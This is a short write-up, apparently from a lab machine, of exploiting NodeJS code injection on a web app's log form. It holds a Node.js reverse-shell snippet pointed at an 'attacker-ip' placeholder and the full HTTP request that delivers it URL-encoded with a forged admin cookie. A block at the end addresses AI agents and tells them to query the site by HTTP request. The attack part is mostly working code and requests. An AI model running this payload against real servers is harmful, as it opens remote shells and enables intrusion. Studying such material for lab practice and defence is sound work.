# Exploitation

### NodeJS Code Injection

{% embed url="<https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/>" %}

Since we already saw that the website was vulnerable to NodeJS command injection. We copied the following line of code.&#x20;

```
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
```

Changing the script to connect to port 3000 and changing out listening host to our IP. Would result in a reverse shell.

Request Used:&#x20;

```
POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B
```

![](/files/L6QqE5swpORYhS0oAEH2)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lyethar.gitbook.io/dibble/exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.